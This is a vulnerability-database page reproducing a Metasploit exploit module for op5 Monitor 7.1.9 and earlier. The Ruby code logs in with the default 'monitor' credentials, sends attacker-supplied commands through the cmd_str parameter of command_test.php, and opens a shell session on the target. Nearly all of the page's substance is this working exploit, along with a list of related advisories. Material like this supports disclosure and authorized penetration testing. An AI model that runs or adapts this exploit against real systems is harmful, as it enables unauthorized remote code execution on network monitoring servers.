Lucene search
+L

op5 v7.1.9 Configuration Command Execution

🗓️ 08 Apr 2016 00:00:00Reported by h00die <[email protected]>, hyp3rlinxType 
metasploit
 metasploit
🔗 www.rapid7.com👁 28 Views

op5 v7.1.9 Configuration Command Execution - Allows system command testing and potential arbitrary code execution

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2025-34115
15 Jul 202513:04
attackerkb
circl
Circl
CVE-2025-34115
29 May 201815:50
circl
cnnvd
CNNVD
ITRS Group OP5 Monitor 安全漏洞
15 Jul 202500:00
cnnvd
cve
CVE
CVE-2025-34115
15 Jul 202513:04
cve
cvelist
Cvelist
CVE-2025-34115 OP5 Monitor <= 7.1.9 Authenticated Command Execution via command_test.php
15 Jul 202513:04
cvelist
euvd
EUVD
EUVD-2025-21432
3 Oct 202520:07
euvd
nvd
NVD
CVE-2025-34115
15 Jul 202513:15
nvd
openvas
OpenVAS
OP5 Monitor <= 7.1.9 RCE Vulnerability
7 Nov 201600:00
openvas
ptsecurity
Positive Technologies
PT-2025-29556 · Op5 · Op5 Monitor
15 Jul 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2025-34115
17 Jul 202513:57
redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  Rank = ExcellentRanking
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'op5 v7.1.9 Configuration Command Execution',
        'Description' => %q{
          op5 an open source network monitoring software.
          The configuration page in version 7.1.9 and below
          allows the ability to test a system command, which
          can be abused to run arbitrary code as an unpriv user.
        },
        'Author' => [
          'h00die <[email protected]>', # module
          'hyp3rlinx' # discovery
        ],
        'References' => [
          [ 'CVE', '2025-34115' ],
          [ 'EDB', '39676' ],
          [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['linux', 'unix'],
        'Privileged' => false,
        'DefaultOptions' => { 'SSL' => true },
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2016-04-08',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),
        OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),
        OptString.new('TARGETURI', [ true, 'The path to the application', '/'])
      ], self.class
    )
  end

  def check
    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path),
        'method' => 'GET'
      )
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
      /Version: (?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+\|/ =~ res.body

      if version && Rex::Version.new(version) <= Rex::Version.new('7.1.9')
        vprint_good("Version Detected: #{version}")
        Exploit::CheckCode::Appears('The target appears to be vulnerable')
      else
        Exploit::CheckCode::Safe('The target is not vulnerable')
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end

  def exploit
    execute_cmdstager(
      :flavor => :echo
    )
  end

  def execute_command(cmd, opts)
    begin
      # To manually view the vuln page, click Manage > Configure > Commands.
      # Click the "Test this command" button to display the form we abuse.

      # login
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'monitor/index.php/auth/login'),
        'method' => 'POST',
        'vars_get' =>
        {
          'uri' => 'tac/index'
        },
        'vars_post' =>
        {
          'csrf_token' => '',
          'username' => datastore['USERNAME'],
          'password' => datastore['PASSWORD']
        }
      )

      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302
      cookie = res.get_cookies
      # exploit
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, 'monitor/op5/nacoma/command_test.php'),
        'method' => 'GET',
        'cookie' => cookie,
        'vars_get' =>
        {
          'cmd_str' => cmd
        }
      )

      # success means we hang our session, and wont get back a response
      if res
        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
        fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end

  def on_new_session(session)
    super
    session.shell_command_token('setsid $SHELL')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation